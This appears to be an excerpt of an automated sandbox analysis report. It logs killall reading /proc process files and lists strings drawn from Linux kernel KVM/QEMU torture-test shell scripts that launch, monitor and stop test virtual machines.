Source: /usr/bin/killall (PID: 4582) | File opened: /proc/151/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/152/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/153/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/395/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/396/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/154/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/155/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/156/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/1017/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/157/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/158/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/159/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3432/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3432/cmdline |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/50/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/51/stat |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) & |
Source: functions.sh0.8.dr | Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-* |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: kill -KILL $qemu_pid |
Source: functions.sh0.8.dr | Binary or memory string: qemu-system-ppc64) |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: echo Monitoring qemu job at pid $qemu_pid |
Source: kvm.sh.8.dr | Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &" |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: qemu_pid=$! |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1 |
Source: functions.sh0.8.dr | Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables. |
Source: kvm-recheck-lock.sh.8.dr | Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null` |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`" |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`" |
Source: functions.sh0.8.dr | Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" |
Source: kvm.sh.8.dr | Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \ |
Source: functions.sh0.8.dr | Binary or memory string: identify_qemu_append () { |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: echo Grace period for qemu job at pid $qemu_pid |
Source: functions.sh0.8.dr | Binary or memory string: qemu-system-x86_64|qemu-system-i386) |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args" |
Source: functions.sh0.8.dr | Binary or memory string: # Returns our best guess as to which qemu command is appropriate for |
Source: kvm.sh.8.dr | Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1 |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: QEMU="`identify_qemu $builddir/vmlinux`" |
Source: functions.sh0.8.dr | Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming |
Source: functions.sh0.8.dr | Binary or memory string: identify_qemu_args () { |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log |
Source: functions.sh0.8.dr | Binary or memory string: qemu-system-x86_64|qemu-system-i386) |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`" |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: # Generate -smp qemu argument. |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1 |
Source: functions.sh0.8.dr | Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE" |
Source: functions.sh0.8.dr | Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type |
Source: kvm.sh.8.dr | Binary or memory string: --qemu-args|--qemu-arg) |
Source: kvm.sh.8.dr | Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD |
Source: functions.sh0.8.dr | Binary or memory string: echo $TORTURE_QEMU_CMD |
Source: kvm.sh.8.dr | Binary or memory string: TORTURE_QEMU_MAC=$2 |
Source: kvm.sh.8.dr | Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`" |
Source: functions.sh0.8.dr | Binary or memory string: specify_qemu_cpus () { |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: vcpus=`identify_qemu_vcpus` |
Source: functions.sh0.8.dr | Binary or memory string: echo qemu-system-ppc64 |
Source: functions.sh0.8.dr | Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC" |
Source: kvm.sh.8.dr | Binary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error' |
Source: functions.sh0.8.dr | Binary or memory string: qemu-system-ppc64) |
Source: functions.sh0.8.dr | Binary or memory string: # identify_boot_image qemu-cmd |
Source: kvm.sh.8.dr | Binary or memory string: TORTURE_QEMU_ARG="$2" |
Source: kvm-recheck-rcu.sh.8.dr | Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null` |
Source: functions.sh0.8.dr | Binary or memory string: # identify_qemu_append qemu-cmd |
Source: functions.sh0.8.dr | Binary or memory string: identify_qemu_vcpus () { |
Source: functions.sh0.8.dr | Binary or memory string: # qemu-args already contains "-smp". |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1 |
Source: functions.sh0.8.dr | Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate |
Source: functions.sh0.8.dr | Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2 |
Source: functions.sh0.8.dr | Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable. |
Source: functions.sh0.8.dr | Binary or memory string: # identify_qemu_vcpus |
Source: kvm.sh.8.dr | Binary or memory string: TORTURE_QEMU_CMD="$2" |
Source: functions.sh0.8.dr | Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus |
Source: functions.sh0.8.dr | Binary or memory string: # identify_qemu_args qemu-cmd serial-file |
Source: functions.sh0.8.dr | Binary or memory string: if test -n "$TORTURE_QEMU_CMD" |
Source: kvm.sh.8.dr | Binary or memory string: --qemu-cmd) |
Source: kvm.sh.8.dr | Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: qemu_args=$5 |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`" |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: # Generate qemu -append arguments |
Source: functions.sh0.8.dr | Binary or memory string: # identify_qemu builddir |
Source: functions.sh0.8.dr | Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable. |
Source: kvm-test-1-run.sh.8.dr | Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments |
Source: functions.sh0.8.dr | Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC |
Source: kvm.sh.8.dr | Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--' |
Source: functions.sh0.8.dr | Binary or memory string: echo qemu-system-i386 |
Source: functions.sh0.8.dr | Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC |
Source: functions.sh0.8.dr | Binary or memory string: echo qemu-system-x86_64 |
Source: functions.sh0.8.dr | Binary or memory string: identify_qemu () { |